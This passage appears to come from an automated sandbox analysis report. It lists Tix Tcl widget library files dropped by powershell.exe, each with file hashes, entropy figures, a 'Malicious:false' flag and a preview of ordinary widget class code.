                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Primitiv.tcl,v 1.7 2004/03/28 02:44:57 hobbs Exp $..#..# Primitiv.tcl --..#..#.This is the primitive widget. It is just a frame with proper..#.inheritance wrapping. All new Tix widgets will be derived from..#.this widget..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......# No superclass, so the superclass switch is not used..#..#..tixWidgetClass tixPrimitive {.. -virtual true.. -superclass {}.. -classname TixPrimitive.. -method {...cget configure subwidget subwidgets.. }.. -flag {...-background -borderwidth -cursor...-height -highlightbackground -highlightcolor -highlightthickness...-options -relief -takefocus -width -bd -bg.. }.. -static {...-options.. }.. -configspec {...{-background back
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13752
                                                                                                                                                                                                                      Entropy (8bit):4.995510453159995
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:/RLzbsJbspBm7DKBuShPxRyWh5GWLWbMb4E:/HTLWg
                                                                                                                                                                                                                      MD5:555CB43282344D72D7C9ACF5B1FD2081
                                                                                                                                                                                                                      SHA1:874F34C56EAC015BA7FE8C8392B9655162FC5112
                                                                                                                                                                                                                      SHA-256:9CD973D3DE2385A0F665CE1C8BF2A8ADA490F6EB396A4E620DCE31E72A0D120F
                                                                                                                                                                                                                      SHA-512:01FAAE6FCC4AE592913AD54420678387377FB2DFB4E0EBEE9CFE01D2873B211DA05AABEE5BDE2E54037DE7980D583639E442F58EADC5AA090A42DDA817725398
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: ResizeH.tcl,v 1.3 2001/12/09 05:04:02 idiscovery Exp $..#..# ResizeH.tcl --..#..#.tixResizeHandle: A general purpose "resizing handle"..#.widget. You can use it to resize pictures, widgets, etc. When..#.using it to resize a widget, you can use the "attachwidget"..#.command to attach it to a widget and it will handle all the..#.events for you...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..#..#....tixWidgetClass tixResizeHandle {.. -classname TixResizeHandle.. -superclass tixVResize.... -method {...attachwidget detachwidget hide show.. }.. -flag {...-command -cursorfg -cursorbg -handlesize -hintcolor -hintwidth -x -y.. }.. -configspec {...{-command command Command ""}...{-cursorfg cursorFg CursorColor
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6178
                                                                                                                                                                                                                      Entropy (8bit):4.82977057877304
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FxgQJm9a48J9+/grhvwVFVOV7VXapkDQXiFPSa:rHJmY7J6grhve7UhQkDQyEa
                                                                                                                                                                                                                      MD5:AA3D4517B986B931E3A44D7A2B77D2E7
                                                                                                                                                                                                                      SHA1:CA0C71A1570BCE8DFE5B4BADB09BBDA360B36075
                                                                                                                                                                                                                      SHA-256:EB657ACB453C6E4C2E60EDCAE955B76EC61F07951186F14B901D35A6163922FC
                                                                                                                                                                                                                      SHA-512:A17517E306E6FDEC77B2FAA8923ED002AE89180DECF8F88D6B53896071FC85D5680B1B63AC34BADDB5AD00965FB4CA488BF5BF4914DCF02496A3F9BB3B83BFA9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SGrid.tcl,v 1.6 2002/01/24 09:13:58 idiscovery Exp $..#..# SGrid.tcl --..#..#.This file implements Scrolled Grid widgets..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....global tkPriv..if {![llength [info globals tkPriv]]} {.. tk::unsupported::ExposePrivateVariable tkPriv..}..#--------------------------------------------------------------------------..# tkPriv elements used in this file:..#..# x -...# y -...# X -...# Y -...#--------------------------------------------------------------------------..#....tixWidgetClass tixScrolledGrid {.. -classname TixScrolledGrid.. -superclass tixScrolledWidget.. -method {.. }.. -flag {.. }.. -configspec {.. }.. -default {...{.scrollbar...auto}...{*grid.bor
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3933
                                                                                                                                                                                                                      Entropy (8bit):4.933310579046346
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RLMfZ6hkw6vbOn6eMRkxoD7n6+tJE02qaCydywWymILiqrKQ4fQJPAaIPS6:FMR26RGaE02qaCc6MLiqrKQWQBWPS6
                                                                                                                                                                                                                      MD5:AA8346EA086CD020B0CB813A777D03FB
                                                                                                                                                                                                                      SHA1:BA149F0E9EAC6DA89575B068CA7C5570C55515F5
                                                                                                                                                                                                                      SHA-256:B16B5135862E52F427D684EC6507B6D13426575FE80B4EFBBE2E6BA70579BDE9
                                                                                                                                                                                                                      SHA-512:CC3675DB7A4B19A65002ED1E9982D85F6E1EF239168C0CAF65666E9E0A81E063E83C2051EDF11BEDC22AB271444FF6F6BA64623A8F8A559A7EFF881C3E04F6BB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SHList.tcl,v 1.7 2004/04/09 21:37:33 hobbs Exp $..#..# SHList.tcl --..#..#.This file implements Scrolled HList widgets..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixScrolledHList {.. -classname TixScrolledHList.. -superclass tixScrolledWidget.. -method {.. }.. -flag {... -highlightbackground -highlightcolor -highlightthickness.. }.. -configspec {...{-highlightbackground -highlightBackground HighlightBackground #d9d9d9}...{-highlightcolor -highlightColor HighlightColor black}...{-highlightthickness -highlightThickness HighlightThickness 2}.. }.. -default {...{.scrollbar...auto}...{*f1.borderWidth..1}...{*hlist.Background..#c3c3c3}...{*hlist.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7433
                                                                                                                                                                                                                      Entropy (8bit):5.056287661399538
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:hlqNAhV3MvvkocCouUEpwaEvLMpvLf5JQ8pmN8L9LvK0AuMPq2fgdvsJy:h3xMvvkocConEpZYMpvTo8pmN85LvK0z
                                                                                                                                                                                                                      MD5:592A9D8DE3D2F6CAEE0E039336BD0A9C
                                                                                                                                                                                                                      SHA1:A586A6A229E55A8AF257C8ED0CC7B8EAE2276B26
                                                                                                                                                                                                                      SHA-256:5A223998F63D38EC72BF3E9933E7AEC7761BDF7B41B07A0B533EB82085AF1E05
                                                                                                                                                                                                                      SHA-512:8866968A5B8A82A5C4B7BA691F796770EC5E7CD79CE98784EEF3C214F2C62F87C2E28245AE3A5E97D885B3D34C6553C38781EE27672BEB8571A4D9F0B4C60108
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SListBox.tcl,v 1.5 2004/03/28 02:44:57 hobbs Exp $..#..# SListBox.tcl --..#..#.This file implements Scrolled Listbox widgets..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......# ToDo:..# -anchor (none)..#....tixWidgetClass tixScrolledListBox {.. -classname TixScrolledListBox.. -superclass tixScrolledWidget.. -method {.. }.. -flag {...-anchor -browsecmd -command -state.. }.. -static {...-anchor.. }.. -configspec {...{-anchor anchor Anchor w}...{-browsecmd browseCmd BrowseCmd ""}...{-command command Command ""}...{-state state State normal}...{-takefocus takeFocus TakeFocus 1 tixVerifyBoolean}.. }.. -default {...{.scrollbar...auto}...{*borderWidth...1}...{*listbox.highlightBackground.#d9d9d
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2521
                                                                                                                                                                                                                      Entropy (8bit):4.733091702783338
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:RLu2usagP0Ssb5ovkjOEIilgoBa7JfhcLFBE7NsLxMFPAsWs/TUTiDJwW:RLHPqmvkSzilBa7JJ+FSBFUiKW
                                                                                                                                                                                                                      MD5:8376FCC2DE53BA148A11691347043383
                                                                                                                                                                                                                      SHA1:D757C5F05A18E129E0DB8BCDDC945E4C94A384DB
                                                                                                                                                                                                                      SHA-256:4B8B15A65B697F7417B2B37E8DCEA0B182D5ED243D968EE744A2E6537691518B
                                                                                                                                                                                                                      SHA-512:93DBBEB3C76896B2CF24394B60359FE20F4568051061E746B38850DE4CCB156EFA9524AE9DB27587902EE95FE5BE7510B3002A6F21942D83AE1615A8B62FC25A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: STList.tcl,v 1.4 2001/12/09 05:04:02 idiscovery Exp $..#..# STList.tcl --..#..#.This file implements Scrolled TList widgets..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixScrolledTList {.. -classname TixScrolledTList.. -superclass tixScrolledWidget.. -method {.. }.. -flag {.. }.. -configspec {.. }.. -default {...{.scrollbar...auto}...{*borderWidth...1}...{*tlist.background..#c3c3c3}...{*tlist.highlightBackground.#d9d9d9}...{*tlist.relief...sunken}...{*tlist.takeFocus..1}...{*Scrollbar.takeFocus..0}.. }..}....proc tixScrolledTList:ConstructWidget {w} {.. upvar #0 $w data.... tixChainMethod $w ConstructWidget.... set data(w:tlist) \...[tixTList $w.tlist].. set d
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3297
                                                                                                                                                                                                                      Entropy (8bit):4.79134018913062
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:RLu2usabP07sb5rfvk3F+6TCuBY1/bAkJrLaBB7CsLxnlF0Tuq6Y5TsWs/TUTiDQ:RLaPr1fvkp/B03JqnjFjT+piHzZrs5l
                                                                                                                                                                                                                      MD5:9DD467215EE043C7772D44BE32011852
                                                                                                                                                                                                                      SHA1:C2935BC12B26A5B96A33F8155BD3B1FA9B878AFB
                                                                                                                                                                                                                      SHA-256:2682DAA8F67C0438696D365284E7CDD57C7C461462B15756755AD5281AFEC44F
                                                                                                                                                                                                                      SHA-512:A4BC24E36C2DD8190167F4B681FA740597E6E2F41314ED27AEB2817F40F6313FBB77464F513144E368606849463B77B06DBA2736E12B0737F0D2FEB0919F013A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SText.tcl,v 1.4 2001/12/09 05:04:02 idiscovery Exp $..#..# SText.tcl --..#..#.This file implements Scrolled Text widgets..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#........tixWidgetClass tixScrolledText {.. -classname TixScrolledText.. -superclass tixScrolledWidget.. -method {.. }.. -flag {.. }.. -static {.. }.. -configspec {.. }.. -default {...{.scrollbar...both}...{*Scrollbar.takeFocus..0}.. }.. -forcecall {...-scrollbar.. }..}....proc tixScrolledText:ConstructWidget {w} {.. upvar #0 $w data.. global tcl_platform.... tixChainMethod $w ConstructWidget.... set data(w:text) \...[text $w.text].. set data(w:hsb) \...[scrollbar $w.hsb -orient horizontal].. set dat
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10213
                                                                                                                                                                                                                      Entropy (8bit):5.0005585584127505
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:rcszc1ixtUt7DQfRe/FtjPX07/ekeilyiffNfPSf2vt:ZixF0JeId5t
                                                                                                                                                                                                                      MD5:8C10360CEF51DBD3E9D11D83201239A2
                                                                                                                                                                                                                      SHA1:0936E4ADF439BCFBB0335C250A5B471EA2123B13
                                                                                                                                                                                                                      SHA-256:7965659057591E4BC091FA276FDFD58670D99D70D264E4A54AC74C3A80E84E04
                                                                                                                                                                                                                      SHA-512:964C956CF8CB813C19693ABF78AB72F87E3A3BCF1B52C8285079E7BECD81B684608E5658E31945DA90AA53A45785A1BB9CCCEF391B4A221C21432A4277D7918A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SWidget.tcl,v 1.5 2002/01/24 09:13:58 idiscovery Exp $..#..# SWidget.tcl --..#..# .tixScrolledWidget: virtual base class. Do not instantiate..#.This is the core class for all scrolled widgets...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......tixWidgetClass tixScrolledWidget {.. -virtual true.. -classname TixScrolledWidget.. -superclass tixPrimitive.. -method {.. }.. -flag {...-scrollbar -scrollbarspace.. }.. -configspec {...{-scrollbar scrollbar Scrollbar both}...{-scrollbarspace scrollbarSpace ScrollbarSpace {both}}.. {-sizebox sizeBox SizeBox 0}.. }..}....proc tixScrolledWidget:InitWidgetRec {w} {.. upvar #0 $w data.... tixChainMethod $w InitWidgetRec.... set data(x,first)
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7182
                                                                                                                                                                                                                      Entropy (8bit):5.025183066498155
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:i/tV440EE9DvODeLFe1AVDKDT1AVDK+ykwDKtw:i1V440hOz4yJ4NykoN
                                                                                                                                                                                                                      MD5:6D18607B39C23B15AE15262985A3624F
                                                                                                                                                                                                                      SHA1:550684B0B7010F75C030353A0B604201214DDDF1
                                                                                                                                                                                                                      SHA-256:13E80A6D76AEB91E2FBF5D36D831F3CDE55E7B8F54EA5611C5C49FA648179339
                                                                                                                                                                                                                      SHA-512:7470E7874A7023E6ABD5935A27D8EC0756117612635E4A7E274FC60BC8BAB5155F83D7A762CC1DEADB53C9C5E8EADEA4DC0D683EC67EEB3F9B066686351E06B6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SWindow.tcl,v 1.4 2001/12/09 05:04:02 idiscovery Exp $..#..# SWindow.tcl --..#..#.This file implements Scrolled Window widgets..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#..#..# Example:..#...#.tixScrolledWindow .w..#.set window [.w subwidget window]..#..# Now you can put a whole widget hierachy inside $window...#..#..#.button $window.b..#.pack $window.b..#..# Author's note..#..# Note, the current implementation does not allow the child window..# to be outside of the parent window when the parent's size is larger..# than the child's size. This is fine for normal operations. However,..# it is not suitable for an MDI master window. Therefore, you will notice..# that the MDI master window is not a subclass of Scrolled
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7504
                                                                                                                                                                                                                      Entropy (8bit):4.906264343167516
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FwsBfBWEEJ/GtQg3LE7z1Z4tf0wZwoqWs/3Vh7XAEDevrwacRwPWvRQ:bfBWEEJ+tQCL0Z4tfzWDAqevowPWW
                                                                                                                                                                                                                      MD5:4B9D398A0572434288A29C7F0AA8AAF2
                                                                                                                                                                                                                      SHA1:0E50C289A8231D3FFCB01102F3077AFE4F941EC1
                                                                                                                                                                                                                      SHA-256:B67B23F24C5F4334BB9DA6C0DB8FD664F2903879CA64BD1804993DF9E1635AF8
                                                                                                                                                                                                                      SHA-512:8CCC1C93586242A50DBD2ADB6407FB43CC36A9524F1AABCA10B08B23CBD1B3E3330D0E7E239B7B8AE0F344B9CD454D7FEDC89AEB78CA59E5C141DA276A91516F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Select.tcl,v 1.3 2001/12/09 05:04:02 idiscovery Exp $..#..# Select.tcl --..#..#.Implement the tixSelect widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixSelect {.. -superclass tixLabelWidget.. -classname TixSelect.. -method {...add button invoke.. }.. -flag {...-allowzero -buttontype -command -disablecallback -orientation...-orient -padx -pady -radio -selectedbg -state -validatecmd...-value -variable.. }.. -forcecall {...-variable -state.. }.. -static {...-allowzero -orientation -padx -pady -radio.. }.. -configspec {...{-allowzero allowZero AllowZero 0 tixVerifyBoolean}...{-buttontype buttonType ButtonType button}...{-command command Command ""}...{-disablecallb
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1129
                                                                                                                                                                                                                      Entropy (8bit):4.8820232315847285
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:RLu2usad0bs9NvkWs7QNBtlufxuvZJpDOK:RL6LvkJUJlMx6hT
                                                                                                                                                                                                                      MD5:AA38D8C239F7AFE16523EEBF86CF7693
                                                                                                                                                                                                                      SHA1:FBDEDD1D98DA2DE4562463BBBEC2C997B2F9A361
                                                                                                                                                                                                                      SHA-256:F23170AB8C06C831C16D4437ABFE5937FEDD3E4810ED5BC1BE39B1C73C6EFE7D
                                                                                                                                                                                                                      SHA-512:EEB05E6439D1E03EDFC01D1AB223C08C76544B56241119E06EB67745865DA9706FD1B3ADDC20D4EE203F2F6BBEA6902F85CAE9A0F843E8BE7A7BAFE10C933F1A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Shell.tcl,v 1.2 2001/12/09 05:04:02 idiscovery Exp $..#..# Shell.tcl --..#..#.This is the base class to all shell widget..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#..# type : normal, transient, overrideredirect..#..tixWidgetClass tixShell {.. -superclass tixPrimitive.. -classname TixShell.. -flag {...-title.. }.. -configspec {...{-title title Title ""}.. }.. -forcecall {...-title.. }..}....#----------------------------------------------------------------------..# ClassInitialization:..#----------------------------------------------------------------------..proc tixShell:CreateRootWidget {w args} {.. upvar #0 $w data.. upvar #0 $data(className) classRec.... toplevel $w -class $data
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1204
                                                                                                                                                                                                                      Entropy (8bit):5.072540551069296
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:RLu2usaYe03rsb7EfvkWN6jmOUQzl0s4LzYDgHBY+NmDg:RLibOvkWMBzlELM0Hm+NmDg
                                                                                                                                                                                                                      MD5:4ECF32870E3B60C08C1FD70BC503700F
                                                                                                                                                                                                                      SHA1:C82CD733989DEE915DFC7A07BD6A8E2337F5C7EF
                                                                                                                                                                                                                      SHA-256:A937709B31C0C7DA5F3FAC25A962945755C64A1AAB66F226F09D28FCAA4B78B0
                                                                                                                                                                                                                      SHA-512:82E8820362136556D60714EC90289239E09B83E4F5F5092AAA662F26F6DDC7EC12017CC4C605C74CD6650FC9C1A13794EBEBBDB47AA0C73ABB9883D879991D59
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SimpDlg.tcl,v 1.2 2001/12/09 05:04:02 idiscovery Exp $..#..# SimpDlg.tcl --..#..#.This file implements Simple Dialog widgets..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixSimpleDialog {.. -classname TixSimpleDialog.. -superclass tixDialogShell.. -method {}.. -flag {...-buttons -message -type.. }.. -configspec {...{-buttons buttons Buttons ""}...{-message message Message ""}...{-type type Type info}.. }..}....proc tixSimpleDialog:ConstructWidget {w} {.. upvar #0 $w data.... tixChainMethod $w ConstructWidget.... frame $w.top.... label $w.top.icon -image [tix getimage $data(-type)].. label $w.top.message -text $data(-message).... pack $w.top.icon -side left -p
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2076
                                                                                                                                                                                                                      Entropy (8bit):4.981779726249709
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RLn4jSajHvk2EHuTRT6qRbvXhd0+vRUa+vRdiHs/LvxImRYWX:F4jBEOMevXhdrSa+riMD58i
                                                                                                                                                                                                                      MD5:8AD6289E95CFDBE44CA0905BE8AFB3B7
                                                                                                                                                                                                                      SHA1:BB1FA208F9B2A7EB1B8057F9DB813AF5AAE4BECA
                                                                                                                                                                                                                      SHA-256:6A959445D5F7257E471275328A965DE8C65CD89D6BC6FABE8008EE2BFF3A75EB
                                                                                                                                                                                                                      SHA-512:225669CEC2A5803329D8DCFA1FAF50A1FED2FC59B95BC07BFFE5F6979451FEBF6D126DADBF23D1565C8F8A3E71C2C38307FC39497A8757C59BD6853998531286
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: StackWin.tcl,v 1.3 2004/03/28 02:44:57 hobbs Exp $..#..# StackWin.tcl --..#..#.Similar to NoteBook but uses a Select widget to represent the pages...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixStackWindow {.. -classname TixStackWindow.. -superclass tixVStack.. -method {.. }.. -flag {.. }.. -configspec {.. }..}....proc tixStackWindow:ConstructWidget {w} {.. upvar #0 $w data.... tixChainMethod $w ConstructWidget.... set data(w:tabs) [tixSelect $w.tabs].... # We can't use the packer because it will conflict with the.. # geometry management of the VStack widget... #.. tixManageGeometry $data(w:tabs) [list tixVStack:ClientGeomProc $w]..}....proc tixStackWindow
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1395
                                                                                                                                                                                                                      Entropy (8bit):4.500016230243969
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:RLu2usa0cA0M+cJsuivk2K3gwndqY7SiyRmiAKN:RLnlp+rvk2ZwndqY+6KN
                                                                                                                                                                                                                      MD5:B4910219186E9E7D925DDA40A0991E45
                                                                                                                                                                                                                      SHA1:C27A6910506C995D8233C1FD8597EE2456A9C811
                                                                                                                                                                                                                      SHA-256:879632D5829F53A37EFB21BC953EAEBE353983BF0A56FD94B42CB83E57FEFEC6
                                                                                                                                                                                                                      SHA-512:9863160010ECE472C96727BD464D1F844123799D8CE3AE43EA190BB89AF319058FCF824B02FB5E2D2FD0AAAC5DE890575850739B60255D33FCC5C8A96F10F867
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: StatBar.tcl,v 1.2 2001/12/09 05:04:02 idiscovery Exp $..#..# StatBar.tcl --..#..#.The StatusBar of an application...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixStatusBar {.. -classname TixStatusBar.. -superclass tixPrimitive.. -method {.. }.. -flag {...-fields.. }.. -static {...-fields.. }.. -configspec {...{-fields fields Fields ""}.. }..}....#--------------------------..# Create Widget..#--------------------------..proc tixStatusBar:ConstructWidget {w} {.. upvar #0 $w data.... tixChainMethod $w ConstructWidget.... foreach field $data(-fields) {...set name [lindex $field 0]...set width [lindex $field 1].....set data(w:width) [label $w.$name -width $width]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1727
                                                                                                                                                                                                                      Entropy (8bit):5.09488972942678
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RLKrvkO6V1bCvXn5yIK3aYybEExFxd83HFx:FY6V1bCvXn5SwxFxd83j
                                                                                                                                                                                                                      MD5:DEC6341408EC0C1F329C516DB59220C1
                                                                                                                                                                                                                      SHA1:83CAE7F7FAA4D90C3ECF456172924BCE94C5F566
                                                                                                                                                                                                                      SHA-256:84A04D9DFA793893DE0AC79577B6E3D7E73BF6B587DE122B486355B12DE4F467
                                                                                                                                                                                                                      SHA-512:F9CE4D2B31F83B35E64AE3DF73485A52F7B7138A28C0744378C6E1790EBD57AE1FAAAE50919CFBE2D753731BF3A43FEFC250C6CF7B5F1A0EC66F048E02317060
                                                                                                                                                                                                                      Malicious:false
